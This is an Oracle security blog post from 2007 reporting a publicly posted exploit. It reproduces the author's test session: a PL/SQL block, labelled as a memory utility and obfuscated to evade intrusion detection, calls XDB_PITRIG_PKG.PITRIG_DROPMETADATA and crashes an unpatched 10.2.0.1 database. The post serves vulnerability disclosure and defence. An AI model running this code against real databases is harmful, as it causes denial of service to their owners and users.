Auditing an Oracle database for security issues is very important. PeteFinnigan.com provides all of the information and tools that you will need Click here for details of PeteFinnigan.com Limited's detailed Oracle database security audit service Click here for details of PeteFinnigan.com Limited's Oracle Security Training Courses
There are 23 visitors online    

Pete Finnigan's Oracle security weblog


Home » Archives » November 2007 » Exploit code to crash an Oracle database posted

[Previous entry: "Pete Finnigan speaking about Oracle 11g Security tomorrow at UKOUG DBMS SIG"] [Next entry: "Pete Finnigan Oracle 11g Security presentation slides available"]

Exploit code to crash an Oracle database posted

November 6th, 2007 by Pete

Post to del.icio.us   Post to Furl   Digg!

Last Friday someone calling themselves oraclefun at hushmail dot com posted an exploit for Oracle database using the package XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA. No versions were given as to which are vulnerable but Alex posted in his blog that unpatched 10.2.0.1 and 10.2.0.2 systems are affected and crash. I tested this on an unpatched 10.2.0.1 database:


SQL> grant create session to x identified by x;

Grant succeeded.

SQL> connect x/x
Connected.
SQL> edit
Wrote file afiedt.buf

1 -- Utility to free Oracle memory
2 declare
3 larry varchar2(32767);
4 mary varchar2(32767);
5 begin
6 larry:='larryellison';
7 larry:=larry||larry;
8 larry:=larry||larry;
9 larry:=larry||larry;
10 larry:=larry||larry;
11 larry:=larry||larry;
12 larry:=larry||larry;
13 larry:=larry||larry;
14 mary:='maryann';
15 mary:=mary||mary;
16 mary:=mary||mary;
17 mary:=mary||mary;
18 mary:=mary||mary;
19 mary:=mary||mary;
20 mary:=mary||mary;
21 mary:=mary||mary;
22 mary:=mary||mary;
23 xDb
24 /*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary
25 , larry);
26* end;
SQL> /
declare
*
ERROR at line 2:
ORA-03135: connection lost contact


SQL> connect system/manager
ERROR:
ORA-12514: TNS:listener does not currently know of service requested in connect
descriptor


SQL> connect system/manager
Connected.
SQL>


As you can see running this Oracle exploit code causes the connection to the database to be lost. This in fact has crashed the database. I had to restart the database:

Oracle 10gR2 exploit for XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA

The interesting thing with this exploit is that it uses some IDS evasion techniques. It uses case changes and also embedded comments to throw off IDS and IPS software that use simple rules to detect this type of attack.

There has been 1 Comment posted on this article

Steven says:
November 8th, 2007 at 08:13 pm

Tried this on 10.2.0.2 on Tru64 both with and without CPUOct2007. Both versions had the following error, but neither database crashed.

exception system: exiting due to multiple internal errors:
exception dispatch or unwind stuck in infinite loop
exception dispatch or unwind stuck in infinite loop
declare
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel



November 2007
SMTWTFS
    123
45678910
11121314151617
18192021222324
252627282930 

About

This is the weblog for Pete Finnigan. Pete works in the area of Oracle security and he specialises in auditing Oracle databases for security issues. This weblog is aimed squarely at those interested in the security of their Oracle databases.

Search weblog

Home and Archives

Weblog Home
Weblog Archives

Recommended reading

Oracle Security Step-by-Step (Version 2.0)

Useful links

Home
Oracle Security Tools page
Oracle security papers
Oracle Security alerts

Other useful blogs

Web Development
SQL Server Security

Syndication - Feeds

RSS 1.0 FEED
RSS 2.0 FEED
Atom 0.3 FEED
Powered by gm-rss 2.0.0

Other Links


Valid XHTML 1.0!